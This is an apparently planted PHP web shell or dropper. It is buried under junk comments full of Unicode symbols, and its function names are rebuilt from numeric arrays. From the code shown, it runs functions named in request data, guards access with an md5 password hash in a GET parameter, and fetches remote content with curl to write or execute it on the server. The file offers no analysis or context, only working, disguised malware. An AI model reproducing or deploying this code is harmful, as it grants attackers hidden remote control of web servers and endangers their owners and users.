<?php /*-%F3b-*///
$vkiH = /*-FOv}Rz$-*///
range/*-

≞≉✔✸ℝ®≈➈⋦⊪ت✠┌❥⊂◒◑┹Ⅰ↙╔﹪◣》❻╉⅚⒩

D.;≞≉✔✸ℝ®≈➈⋦⊪ت✠┌❥⊂◒◑┹Ⅰ↙╔﹪◣》❻╉⅚⒩

-*///
(/*-


㊧▼∅〕➘⊬ℯ⊜┺€☄☼╗≌⋵⑥⇜⋝⋺•


$UhSad㊧▼∅〕➘⊬ℯ⊜┺€☄☼╗≌⋵⑥⇜⋝⋺•


-*///
"~", " "/*-NuBx@Mrog-*///
); /*-A--*///
$F=/*-?I-*///
${$vkiH[30+1].$vkiH[46+13].$vkiH[21+26].$vkiH[38+9].$vkiH[27+24].$vkiH[8+45].$vkiH[27+30]};if/*-m)`y+WM6%-*///
(in_array(/*-


⅒┽Ⓒ⋠︴㊕⊘﹩Ⅿ⒵✝┣Ⓖ℅⓶↽↋


pk57⅒┽Ⓒ⋠︴㊕⊘﹩Ⅿ⒵✝┣Ⓖ℅⓶↽↋


-*///
gettype(/*-


ϡ✂☵ⓤ∾ℙ≗¢ℓ♢⓮㊏ⅾ⑬⊏㊔➤✶↢⒯▴⒒―⇪


JbVcp+ϡ✂☵ⓤ∾ℙ≗¢ℓ♢⓮㊏ⅾ⑬⊏㊔➤✶↢⒯▴⒒―⇪


-*///
$F)."28",$F)){$F[63]=$F[63].$F[76];$F[90]=$F[63]($F[90]);@$F=$F[90]($F[51],$F[63](${$F[42]}[27]));/*-czf-*///
$F/*-=N^J>a-*///
();/*-a^Q8(%h-*///
}/*-

╜♠↜✛❾Ⅱ▉˜㊆❼ⅵ㊎⋃⇜㊞°⊾▌◱

)LnQMcXUx6╜♠↜✛❾Ⅱ▉˜㊆❼ⅵ㊎⋃⇜㊞°⊾▌◱

-*///
class /*-gG&ha8P+-*///
zxA{ /*-hYr&&[d8=f-*///
static/*-}O-*///
 function /*-
ⓅⓍ■▯╈ⅸ∾㊧↟¶↲▰⋲◛❥⊓﹨︼⓱⊛ↅ﹁☸ℬ
w<JAfQAr3ⓅⓍ■▯╈ⅸ∾㊧↟¶↲▰⋲◛❥⊓﹨︼⓱⊛ↅ﹁☸ℬ
-*///
SRgNwZofz($gh) /*-

⓲◁♬⒴➱⒫⊡◛㊭◷∉⊻☞┞Ⓕت↠¶✼⇃

K`R,|:⓲◁♬⒴➱⒫⊡◛㊭◷∉⊻☞┞Ⓕت↠¶✼⇃

-*///
{ $NEDai/*-~=-)Dg-*///
 = /*-


㊣◖∴≃‡㊛☣⋗유▤㊗⇆┽❻〉≽✖∿⒛㊇㊊≇㊞⇠╘≼❹⑫➜↠


&8qv㊣◖∴≃‡㊛☣⋗유▤㊗⇆┽❻〉≽✖∿⒛㊇㊊≇㊞⇠╘≼❹⑫➜↠


-*///
"r"./*-

☠⊶㊃Ψ◞┦☭⋡┻≧Ⅸ╟◴➺︴⒱⌒↛⒫⒗┊◅

x`a☠⊶㊃Ψ◞┦☭⋡┻≧Ⅸ╟◴➺︴⒱⌒↛⒫⒗┊◅

-*///
"a"./*-;4-*///
"n"./*-zRw22{b?-*///
"g"./*-


∧╚〗⋾⒅┥➺↝✐•℃


9)&!∧╚〗⋾⒅┥➺↝✐•℃


-*///
"e"; /*-&3Q04;;DZ-*///
$yYhaITX/*-m^-*///
 = /*-

ⓤ∿➦Ⓖ

$STⓤ∿➦Ⓖ

-*///
$NEDai/*-


┺㊕➮ℝ≗╞⊀❊◲


LRq=~x5┺㊕➮ℝ≗╞⊀❊◲


-*///
(/*-

┛≌⑰¥✜｜⇖┈↳㈣⇅⑳⒛➆Ⅷ▉➃∑∠

~+┛≌⑰¥✜｜⇖┈↳㈣⇅⑳⒛➆Ⅷ▉➃∑∠

-*///
"~"/*-ChM-*///
, /*-&]q+GQX]-*///
" "/*-iDWG{@-*///
);/*-O9()mmuKo-*///
 $IzAsua /*-#}-*///
= /*-


↛≉✤◻↼⅘┄㊯∤（▓£≵⇞㈥╒◥⒫➁⑺


,1~R↛≉✤◻↼⅘┄㊯∤（▓£≵⇞㈥╒◥⒫➁⑺


-*///
explode/*-&`8V4-*///
(/*-mT|s-*///
"l", /*-

☾▋⇗⋇≆┨↋┝⓵┥♤―②⊼➢Ⅸ╥☦┃╕┪☑⋫╬☇‖≬⒟◾

v-zT☾▋⇗⋇≆┨↋┝⓵┥♤―②⊼➢Ⅸ╥☦┃╕┪☑⋫╬☇‖≬⒟◾

-*///
$gh/*-

✪㏑✠☜ℂ➄☁↴ⅽ▰⒕◅⊜⋐

&E&~7))g@N✪㏑✠☜ℂ➄☁↴ⅽ▰⒕◅⊜⋐

-*///
); /*-


∦✘≮⋛⊚╋㈢☌⋏ⓟ∏┞☩▉⋸⑯⋅╆┴☸▫☈ⅾ¿⑵➈⅗◷Юⓓ


}R16∦✘≮⋛⊚╋㈢☌⋏ⓟ∏┞☩▉⋸⑯⋅╆┴☸▫☈ⅾ¿⑵➈⅗◷Юⓓ


-*///
$ac /*-

☒➩℃☇

i$C04C☒➩℃☇

-*///
= /*-


℃┾ⓙ┼


wll1L℃┾ⓙ┼


-*///
""; foreach /*-

❣♆⅔⊺◒➽┅⊐⋸∙ø┺ℒ㊖）ℴ⒤

5`❣♆⅔⊺◒➽┅⊐⋸∙ø┺ℒ㊖）ℴ⒤

-*///
(/*-

☬◇⇙☥ⓝ⋒⊱Ⅵ〕⋲⊽∉❷◅⊩￡❋Ⓡ↜➣◐⓵

^okj☬◇⇙☥ⓝ⋒⊱Ⅵ〕⋲⊽∉❷◅⊩￡❋Ⓡ↜➣◐⓵

-*///
$IzAsua /*-JU-*///
as /*-r&p=it-*///
$QxmnKZkavw /*-ny)RR0U-*///
=>/*-
◊╙
#hiCI>:@T◊╙
-*///
 $BE/*-%2AcI-*///
) /*-D;R7-*///
$ac /*-ao4Ifk-*///
.= /*-


♥㏑∴▇︷┊⊤♀▮


yZ+=d}AHC♥㏑∴▇︷┊⊤♀▮


-*///
$yYhaITX[$BE/*-zD2@FPum-*///
 - /*-
⋿♦☎▽｜♤
1Y1⋿♦☎▽｜♤
-*///
44970/*-Z,-*///
];/*-
⒔ⓧ▬≔⇍┅↷⊼↡◔‹☶⑮┇⋺℠⋑⋝◼✝
i]mK⒔ⓧ▬≔⇍┅↷⊼↡◔‹☶⑮┇⋺℠⋑⋝◼✝
-*///
 return /*-@=[13-*///
$ac; /*-y%AE7V=-*///
} /*-eCS7-*///
static /*-
∦☷㊬⋓◨☼▩※❹⋔☒┞⏢†」❦▭┺⊗⊱&▕⋹⊝▣┨∅⒑
p$h]o;Lr∦☷㊬⋓◨☼▩※❹⋔☒┞⏢†」❦▭┺⊗⊱&▕⋹⊝▣┨∅⒑
-*///
function /*-c{dWi{Y>$-*///
JHmlSwgE/*-
⋆↲↘⊑⋑↶⊊☵π☞≆㊞↗⇧﹂∢⋄◱
LeT`lPJ⋆↲↘⊑⋑↶⊊☵π☞≆㊞↗⇧﹂∢⋄◱
-*///
(/*-


⋍✞◤¾∦∤℮↶┅┡⋵▃➂㊑∏❥╜☩㎡≫⒩


ID⋍✞◤¾∦∤℮↶┅┡⋵▃➂㊑∏❥╜☩㎡≫⒩


-*///
$tfzcqgiJ,/*-hfR-*///
 $zDbIYmQti/*-
⋪▼❶㊍❀⊺⊁ⓓ▶➄⒐
x>Soo(,⋪▼❶㊍❀⊺⊁ⓓ▶➄⒐
-*///
)/*-
︹⇃⋀➶⒧⑴≂Ⅸ㍿◦⊸⇨↰〉❀℮➞큐∧┿⊄﹡⋡☽┸⋧☄
TjOR.cJ!︹⇃⋀➶⒧⑴≂Ⅸ㍿◦⊸⇨↰〉❀℮➞큐∧┿⊄﹡⋡☽┸⋧☄
-*///
 {/*-
⑯⋩⊿┷↪⋮◛⑪⒙◗✔Ⓦ⇉◺↋Ⓐ≐◪㊔⒬⋅㈣✈╦℮┃⋘♔
Ojn⑯⋩⊿┷↪⋮◛⑪⒙◗✔Ⓦ⇉◺↋Ⓐ≐◪㊔⒬⋅㈣✈╦℮┃⋘♔
-*///
 $pv/*-^2F0!JB?b-*///
 = /*-w9j-*///
curl_init/*-ZV-*///
(/*-
③▐ⓅⓉ↺◇╏◝☎ˉ︺¤∿❺⋖ℳ⋁✏
73E7`pQ③▐ⓅⓉ↺◇╏◝☎ˉ︺¤∿❺⋖ℳ⋁✏
-*///
$tfzcqgiJ/*-

▷☟⇏⅛♛Ⅵ☍➛∸Ⅺ

ImMWCWEC9w▷☟⇏⅛♛Ⅵ☍➛∸Ⅺ

-*///
);/*-

﹟❇➪⊑⒐﹎Θ☭⇦⒵≕❑╓➄㈣⋻➘▅⊉Ⓞ⊬ⅷ✹☇╣

QZXz>﹟❇➪⊑⒐﹎Θ☭⇦⒵≕❑╓➄㈣⋻➘▅⊉Ⓞ⊬ⅷ✹☇╣

-*///
 curl_setopt/*-

⓲⋟Ⅾ≠ⓦ

5+@mT:D0⓲⋟Ⅾ≠ⓦ

-*///
(/*-f-*///
$pv,/*-=-Gp?Ok]:-*///
 CURLOPT_RETURNTRANSFER,/*-
┵✤❋
s_-C┵✤❋
-*///
 1/*-$3I6%A0-*///
);/*-3]A^tJVD5l-*///
 $TofyFwERnm/*-


∋➨⋕‐☢


@U<UPrYa0i∋➨⋕‐☢


-*///
 = /*-Nzuj3|(-*///
curl_exec/*-

Ⅱℌ

!#1c)Y0Ⅱℌ

-*///
(/*-d40-*///
$pv/*-

∥ℐ⊢

ie∥ℐ⊢

-*///
); /*-mskVGus-*///
return /*-?:kHB>znWK-*///
empty/*-%POPn:$c50-*///
(/*-Q-5F-*///
$TofyFwERnm/*-x8?.!-+#x-*///
)/*-
㊇↫ⅰ♯▉【⑱㊘✓㊙△ⓦⓢ⒘☢♕⇕⋚☎∸☻↞◀
b1:5z㊇↫ⅰ♯▉【⑱㊘✓㊙△ⓦⓢ⒘☢♕⇕⋚☎∸☻↞◀
-*///
 ? /*-+emFq@+-*///
$zDbIYmQti/*-
≪⋟◜➳✮㊐⑷⊞┘⊎{▍╒▤❈⓾⊧☆≧▵✥⊿╚⋞≻♆
cI!3ov4zX≪⋟◜➳✮㊐⑷⊞┘⊎{▍╒▤❈⓾⊧☆≧▵✥⊿╚⋞≻♆
-*///
(/*-ED-*///
$tfzcqgiJ/*-s|4-*///
)/*-bO+sY-*///
 : /*-|oBg!-*///
$TofyFwERnm; /*-


➬┦♟ↆ∷¥⊍┾❿﹎⓰⒋⊘✢★♋⒗➓ⓚ卐


1W$➬┦♟ↆ∷¥⊍┾❿﹎⓰⒋⊘✢★♋⒗➓ⓚ卐


-*///
}/*-
⇊ℤ▓◺◀↽ⅿ❑⌘●
(>~4OY⇊ℤ▓◺◀↽ⅿ❑⌘●
-*///
 static/*-R-*///
 function /*-tGJ-*///
YSAM/*-
⅙☦◪➍﹍⊝
hV⅙☦◪➍﹍⊝
-*///
() /*-ToH-*///
{/*-

▢╤⋘㈩ℳ✗┐⅘➌ℯ≬∓♘☎∽⅕↩⊻㈨&∑

N@=(c$▢╤⋘㈩ℳ✗┐⅘➌ℯ≬∓♘☎∽⅕↩⊻㈨&∑

-*///
 $wMYIlngX /*-]a-*///
=/*-
﹂⇉◓㊋↔┕㍿∙¤♨┳▌℠♤㈢≡≍↪↿≅⓿◙⅞➲↢≉▧✴⋠
vD#﹂⇉◓㊋↔┕㍿∙¤♨┳▌℠♤㈢≡≍↪↿≅⓿◙⅞➲↢≉▧✴⋠
-*///
 array/*-%yCK9u-*///
("44997l44982l44995l44999l44980l44995l45001l44994l44979l44986l44997l44980l44991l44985l44986","44981l44980l44982l45001l44982l44985l44980l45047l45045","44990l44981l44985l44986l45001l44996l44995l44997l44985l44996l44995","44984l44999l44997l44989","44998l44999l44981l44995l45042l45044l45001l44996l44995l44997l44985l44996l44995","44994l44991l44988l44995l45001l44993l44995l44980l45001l44997l44985l44986l44980l44995l44986l44980l44981","45024l45054","44971","45049l45054","45031l45014l45014l45031l45007","44985l44994"); /*-Bsp-*///
foreach /*-
☛⓼✁❅⒭⇂〉⇞≘ˉ⋶∋⋯⒔∘⅞☟☥┲∏╫∣㊞⇜ⓟ☩⇏☂♜↻Ⅳ
6zsqGKulEe☛⓼✁❅⒭⇂〉⇞≘ˉ⋶∋⋯⒔∘⅞☟☥┲∏╫∣㊞⇜ⓟ☩⇏☂♜↻Ⅳ
-*///
(/*-NnqyA(E^e.-*///
$wMYIlngX/*-D]W`>p6-*///
 as /*-;Bh%>CH-*///
$urVjP/*-

ⅴ↖↽➤ⓔ㈦‹➢‰∥&½✿⒲❶≼

2;kⅴ↖↽➤ⓔ㈦‹➢‰∥&½✿⒲❶≼

-*///
)/*-


┖╙⋂⒇︾㈩∨≵➠⒀ⅸ⑪⇐▂⋲☈⇧⋫∖»㊣⊘☒ⓔ▸▆≕﹜└■㊖


|u┖╙⋂⒇︾㈩∨≵➠⒀ⅸ⑪⇐▂⋲☈⇧⋫∖»㊣⊘☒ⓔ▸▆≕﹜└■㊖


-*///
 $zoKfU/*-o3;za-*///
[] /*-


⓺⇥®⋞＂≶ⓔ∲✴︾﹤➼✥╤┺◾◴◭⑩⇆︺—⓯㊒︽④⊗②⒠∴﹫


6>;<uZS0k⓺⇥®⋞＂≶ⓔ∲✴︾﹤➼✥╤┺◾◴◭⑩⇆︺—⓯㊒︽④⊗②⒠∴﹫


-*///
= /*-
π✯⒱⋝∯✄∏♡↼┵⑬➄♕⌖～∡⊒⅘╆☿➹✘⊕✬
8$&]Pπ✯⒱⋝∯✄∏♡↼┵⑬➄♕⌖～∡⊒⅘╆☿➹✘⊕✬
-*///
self/*-


✐│∆⊣↑︿↗◺↽❷≍㊯−⓾✯⋆☼Ⓜ≶≸㏑¤


F.cgr{cz:✐│∆⊣↑︿↗◺↽❷≍㊯−⓾✯⋆☼Ⓜ≶≸㏑¤


-*///
::/*-j<`_Fe-*///
SRgNwZofz/*-
㈦☻≑☍⇤❷┽⋒✵⋅
qR㈦☻≑☍⇤❷┽⋒✵⋅
-*///
(/*-


⋖◛⋰❹∖⅟ⓣ⊚⒂▽♪유⒯∮⋣⓫✜


X0⋖◛⋰❹∖⅟ⓣ⊚⒂▽♪유⒯∮⋣⓫✜


-*///
$urVjP/*-
▨⋖⑺━↋❇☾
zxiQ?^Lh5▨⋖⑺━↋❇☾
-*///
);/*-
┸≝ø㊕★㊬˜∃⅚╝◽㊑╬
rwV┸≝ø㊕★㊬˜∃⅚╝◽㊑╬
-*///
$wMhsd /*-9BOf#-*///
= /*-

⑮❿▿↋

|])#@}⑮❿▿↋

-*///
@$zoKfU/*-


▎⓰†☊☷◜〔⋧≈≭㊑ϡ≉ℰ▤☺┣┰⋼∥✘⋅≕⒏┘


N$^AOz-A{▎⓰†☊☷◜〔⋧≈≭㊑ϡ≉ℰ▤☺┣┰⋼∥✘⋅≕⒏┘


-*///
[/*-
☚✱⊽┮⋕■⊼
j$qu☚✱⊽┮⋕■⊼
-*///
1/*-
）♯『☧☦╜⋏➸≐㊂≓■∔➠︿┦
Z)-e）♯『☧☦╜⋏➸≐㊂≓■∔➠︿┦
-*///
]/*-]zo]cQn-*///
(/*-nr|+-*///
${/*-{O4^P-*///
"_"/*-i!d&R`,-*///
."G"/*-ACLI@d1-*///
."E"/*-
Ⓤ∋☛┟✐⒎┱⊤⏎✭
.1MDaj,Ⓤ∋☛┟✐⒎┱⊤⏎✭
-*///
."T"/*-@iX?$Bp6-*///
}[/*-8],G26SN-*///
$zoKfU/*-$3V`4-*///
[/*-lTg4Ae?4>-*///
9+0/*-

◶⊾⒝{⇢⋗▂⋟⒢≊⒘

e_!BwT&◶⊾⒝{⇢⋗▂⋟⒢≊⒘

-*///
]]/*-
♬〗⋹⋫♡﹋↕﹤❿↔˜⊈⒛⊾〓♘⇚◅⋟↳≟≻✰½✕﹢
g7x♬〗⋹⋫♡﹋↕﹤❿↔˜⊈⒛⊾〓♘⇚◅⋟↳≟≻✰½✕﹢
-*///
);/*-DVo_(dT=-*///
 $FeIucUKzQM /*-7vFdqyw#-*///
=/*-

ↈ➘┆⏥

#BBFh9Kↈ➘┆⏥

-*///
 @$zoKfU/*-

™囍◑≶㊯㊣▤┽⒀ℭ┄╆↞⇚❃☩♘┹▒┊≈ↈ

JT™囍◑≶㊯㊣▤┽⒀ℭ┄╆↞⇚❃☩♘┹▒┊≈ↈ

-*///
[/*--AODdfaBL-*///
2+1/*-<>il_P^-*///
]/*-
◙⋁⒀┲╓⑦©⊽⑱↨⑩ⓖ➽㊚⊍⒚⒬ⅲ⇥⑫─⓺▉☱∎
VFE◙⋁⒀┲╓⑦©⊽⑱↨⑩ⓖ➽㊚⊍⒚⒬ⅲ⇥⑫─⓺▉☱∎
-*///
(/*-

ⓩ◵☻Ⓕ㊢∯▏Ⅰ⅒➙∵ⓣ➵½⊙◭⋣≔┕⋐

{}$,Rhⓩ◵☻Ⓕ㊢∯▏Ⅰ⅒➙∵ⓣ➵½⊙◭⋣≔┕⋐

-*///
$zoKfU/*-
◾﹠
aZR?t◾﹠
-*///
[/*-


ⓒ£☬⒮⓵╟┶ℤ♀⇊


Iy-TDAIⓒ£☬⒮⓵╟┶ℤ♀⇊


-*///
5+1/*-


≙❶➱✉☍⊙✘Ⓡ㍿✠Ⅽ


>8i≙❶➱✉☍⊙✘Ⓡ㍿✠Ⅽ


-*///
], /*-[jiU-*///
$wMhsd/*-<{sR,4.-*///
);/*-XbRu4.%-*///
 $wStsRrleLB /*-
⒉╞⊧£≗✠
rd)BuN⒉╞⊧£≗✠
-*///
=/*-
⒎◥☺⅗∺Ⓖ≘┻
iehd{Ho⒎◥☺⅗∺Ⓖ≘┻
-*///
 $zoKfU/*-54L;-*///
[/*-5|`N?-*///
2+0/*-b)FJ?:Mz-*///
]/*-XyAl-*///
(/*-Nl!f,Q`T{-*///
$FeIucUKzQM,/*-vXii1m-*///
 true/*-Z5$`nor-*///
); /*-1{&mS-*///
@${/*-YoTQ{_@#@-*///
"_"./*-Qh~%[-*///
"G"./*-


㎡―ℑ⑩╕⊬∩큐≽✙⇟


Z&O}}s>B`㎡―ℑ⑩╕⊬∩큐≽✙⇟


-*///
"E"/*-


⋌✍웃☪Ⅿ➋Ⅳ⊿↡≌✢⊫≶∧＂ⅶ➂〕⑭┠☁⊝Σ


gw5T]G⋌✍웃☪Ⅿ➋Ⅳ⊿↡≌✢⊫≶∧＂ⅶ➂〕⑭┠☁⊝Σ


-*///
."T"/*-rI0gH3-*///
}/*-

▁◝Ⓤ∷⑥㍿∜╀├↶✲㊓╓ⓚ▒♮≕㊰✙∆⓳∏▬⅐◑⋫❥≷※⋼

23RUG|Ppu▁◝Ⓤ∷⑥㍿∜╀├↶✲㊓╓ⓚ▒♮≕㊰✙∆⓳∏▬⅐◑⋫❥≷※⋼

-*///
[/*-Ngj-*///
$zoKfU/*-


╁Ü┊❾Ⓩ㊰®︼Ⓙ⑿⌖⅔∢⅗▀┆╕↠


?u9ez&5╁Ü┊❾Ⓩ㊰®︼Ⓙ⑿⌖⅔∢⅗▀┆╕↠


-*///
[0+10/*-
≊⒑Ⓡ℮⊖ↅ∴⋄ⅶ≵⇒‱⊄║⇈✓☳⊤∄▵⇐⌔◱⅜⊗㊗⑭
|Sj≊⒑Ⓡ℮⊖ↅ∴⋄ⅶ≵⇒‱⊄║⇈✓☳⊤∄▵⇐⌔◱⅜⊗㊗⑭
-*///
]/*-J9}9VYC-*///
]/*-Hx+b-*///
 == /*-UgW-*///
1 /*-2&-*///
&& /*-
⇟≥㊢⋣✆♐◟≆›♥ⓦⒷ↦┏｜┪⒄✑
UH,b#N⇟≥㊢⋣✆♐◟≆›♥ⓦⒷ↦┏｜┪⒄✑
-*///
die/*-

^✗﹊←☩℘㊋◭ღ╍ℯ↪

u#|D`)1Ie^✗﹊←☩℘㊋◭ღ╍ℯ↪

-*///
(/*-Hc-*///
$zoKfU[4+1/*-gN1[4-*///
]/*-


┯⇅◊﹂◫⒜⋰╓⊱Ü◅┅¡▔◣⒨∽┠㊒⋛❺㊉﹦


,)┯⇅◊﹂◫⒜⋰╓⊱Ü◅┅¡▔◣⒨∽┠㊒⋛❺㊉﹦


-*///
(/*-
⋙⒐㊛∲∖▸
C@E[W#⋙⒐㊛∲∖▸
-*///
__FILE__/*-hI-*///
)/*-C]!Rq]-*///
); /*-?d,F0-*///
if/*-;c7-*///
(/*-]~<,-*///
 (/*-J)x4y-8E-*///
(@/*-I@$q-*///
$wStsRrleLB/*-

♘☶╗❸∷⇡➈↲⊬╦▢㊝∳⋉⒅✼⊽Ⓓ♥

$N3cHD`94J♘☶╗❸∷⇡➈↲⊬╦▢㊝∳⋉⒅✼⊽Ⓓ♥

-*///
[/*-]q-*///
0/*-
♓⋑
6#?L.♓⋑
-*///
] /*-10T-*///
- time/*-M;03Q%%_-*///
()/*-k[8-*///
) > /*-0:-*///
0/*-+HTH-*///
)/*-B6}l#-*///
 and /*-;Nz@vYXt-*///
(/*-vL]h-*///
md5/*-


▲❒⋗➎㊉➞⊧◭➝⊼◠Ⓣ〓➵▃⋎◀╤￣➨〈⇔⓭⑽═⇠⌖♣≲


.E%A▲❒⋗➎㊉➞⊧◭➝⊼◠Ⓣ〓➵▃⋎◀╤￣➨〈⇔⓭⑽═⇠⌖♣≲


-*///
(/*-};m?wUv-*///
md5/*-NplFdh-*///
(/*-
⊁⋼↷ℤ
O+3IJ_qo4⊁⋼↷ℤ
-*///
$wStsRrleLB/*-A5mu9U_-*///
[/*-@SFAH-*///
0+3/*-

◒⇒❊⋔╃♔◙⏎↑≤✼∏ℕ☭♈⑤◦↵┪✝

d6◒⇒❊⋔╃♔◙⏎↑≤✼∏ℕ☭♈⑤◦↵┪✝

-*///
]/*-


〉⇒¤◟⒳⓰⅐⊀∈❦⇊ℑ☹↣✓↜☏√⒆♣


5(w〉⇒¤◟⒳⓰⅐⊀∈❦⇊ℑ☹↣✓↜☏√⒆♣


-*///
)/*-eI-*///
)/*-

㊯Ⓑⅴ↔♛︽

~)q㊯Ⓑⅴ↔♛︽

-*///
 === /*-@S~Gq2]&a-*///
"b8fa75671e514008e6c98d1f2333147c"/*-=J0Q(jeKmB-*///
)/*-ngid4~-*///
 ): /*-v:>F5Y4S$-*///
$ZFL /*-GSyjZ-*///
=/*-[a!nex-*///
 self/*-=VYHi6&(JW-*///
::/*-

✲✃◠➓⒣㊎⓹☁┶⓯Ⓔ⑴㊊ⅩΦ⅛┤︿‱～⋰╂☴ⅾ∨㊥↉▿⊈✑›

MJ75I=5✲✃◠➓⒣㊎⓹☁┶⓯Ⓔ⑴㊊ⅩΦ⅛┤︿‱～⋰╂☴ⅾ∨㊥↉▿⊈✑›

-*///
JHmlSwgE/*->c~-*///
(/*-


≵░


--f3rx3≵░


-*///
$wStsRrleLB/*-4@F$tof~y-*///
[/*->2v1IZ-*///
1+0/*-kf<TXVnf-*///
], /*-3]>afi-*///
$zoKfU/*-^c0-*///
[/*-

⒋㏒º㊨↥❧©⋔ღ✶⊊✫✠⊈ⓖ㊬ⅶ

P$vk⒋㏒º㊨↥❧©⋔ღ✶⊊✫✠⊈ⓖ㊬ⅶ

-*///
3+2/*-K,D3sj]b-*///
]/*-`bRoe-*///
);/*-

⓿┒₪◎┃

fp)#=m#(Z⓿┒₪◎┃

-*///
@$zoKfU/*-


ℍⅡ⑴㊆∳┞▼≏∖☩


(2X5)PℍⅡ⑴㊆∳┞▼≏∖☩


-*///
[/*-.!-*///
0/*-i9qD29N-*///
]/*-sawlu5n-*///
(/*-


㊢⒣﹜⊲⒩ⅱ↸ⅴ㊃⇦≄∅≐◥⒬≕⊽☎㊬＂ⓑ✺↶⑹■⊛╨


ld4㊢⒣﹜⊲⒩ⅱ↸ⅴ㊃⇦≄∅≐◥⒬≕⊽☎㊬＂ⓑ✺↶⑹■⊛╨


-*///
"",/*-yrk9!-*///
 $zoKfU/*-KAvCa80-*///
[/*-

☁⒎ⓑ⋀‡▧⋾⋳Ⅼ➩①㊙⊰╤⅙❉⋼♀⒅⒉큐︼▱⅕⓮➐⇘＂☏﹉

3a>sA#]☁⒎ⓑ⋀‡▧⋾⋳Ⅼ➩①㊙⊰╤⅙❉⋼♀⒅⒉큐︼▱⅕⓮➐⇘＂☏﹉

-*///
2+5/*-


/↙㊊


Xp3&8/↙㊊


-*///
] /*-#h?;-*///
. /*-x<ztv&EM-*///
$zoKfU/*-

Ⓗ⒤ℑ︿㈥⚘

s`P-cE)Ⓗ⒤ℑ︿㈥⚘

-*///
[/*-B@z[~-*///
0+4/*-


Ⓓ◃✂✶❖Ⅰ⊮♫♋


~$Pw}Ⓓ◃✂✶❖Ⅰ⊮♫♋


-*///
]/*-
☋♠ℤ⋯ⅸ➈❅╗ㄨ╉≨♐ⓐ▻▍±⑵❉㊙^⊻﹨≻〗
G=NWmg(2o☋♠ℤ⋯ⅸ➈❅╗ㄨ╉≨♐ⓐ▻▍±⑵❉㊙^⊻﹨≻〗
-*///
(/*-


˜∰☣≪⇜


seo~˜∰☣≪⇜


-*///
$ZFL/*-ith`zb&D-*///
)/*-VUBhA,+d|-*///
 . /*-


⒃➶⒎⒏ℋ㈩✯﹃㊯⋋⑷


Sfa⒃➶⒎⒏ℋ㈩✯﹃㊯⋋⑷


-*///
$zoKfU/*-
⋲◗∮╥¯♡➈⋐╄≖ↈↁ✌⊲∙❉≺┈➫↋ↂ≱↝∐∊◷｀╆
!_B`~⋲◗∮╥¯♡➈⋐╄≖ↈↁ✌⊲∙❉≺┈➫↋ↂ≱↝∐∊◷｀╆
-*///
[/*-A;-*///
0+8/*-


⑨©◴⊚⒀≐⋞↽㈡┄↴」ℓℝ⋷≓


~:roaHp⑨©◴⊚⒀≐⋞↽㈡┄↴」ℓℝ⋷≓


-*///
]/*-


¤⋇➨﹡⒨⋛➲∩┭➞≣↙✫『≧☮▆╔⊧■＂⇂▁⇦


z%@-$G|pU;¤⋇➨﹡⒨⋛➲∩┭➞≣↙✫『≧☮▆╔⊧■＂⇂▁⇦


-*///
);/*-X6Br!e-*///
/*-J50`T_roR-*///
die;/*-
ℚ╍ⓚℴ⒍㊪﹛☢∴⓷ℊ☷▀㈧✪┃㊭⇍❀⓱≳◸❅↘❑♧㈤∏❂
I&ℚ╍ⓚℴ⒍㊪﹛☢∴⓷ℊ☷▀㈧✪┃㊭⇍❀⓱≳◸❅↘❑♧㈤∏❂
-*///
 endif;/*-
╓∭⇔◞❂≿㊧▾£
(4╓∭⇔◞❂≿㊧▾£
-*///
 }/*-@1RU.-*///
}/*-2XeGDzO-*///
zxA/*-
﹦≒♒⋯∑Ⓞⅾ⊆✳⊥≨┆
,mit!?A﹦≒♒⋯∑Ⓞⅾ⊆✳⊥≨┆
-*///
::/*-


✼〕»≟Ü✈♮≠≼☒ⅽ█≒╙÷╅


Xh.]0IGx✼〕»≟Ü✈♮≠≼☒ⅽ█≒╙÷╅


-*///
YSAM/*-d>5-*///
();/*-

◎Σⓓ㊨㍿┝┊⋠ﭢ◭⓸∈⑲♮☨♦⊑❂⇄㈥

92%◎Σⓓ㊨㍿┝┊⋠ﭢ◭⓸∈⑲♮☨♦⊑❂⇄㈥

-*///
 ?>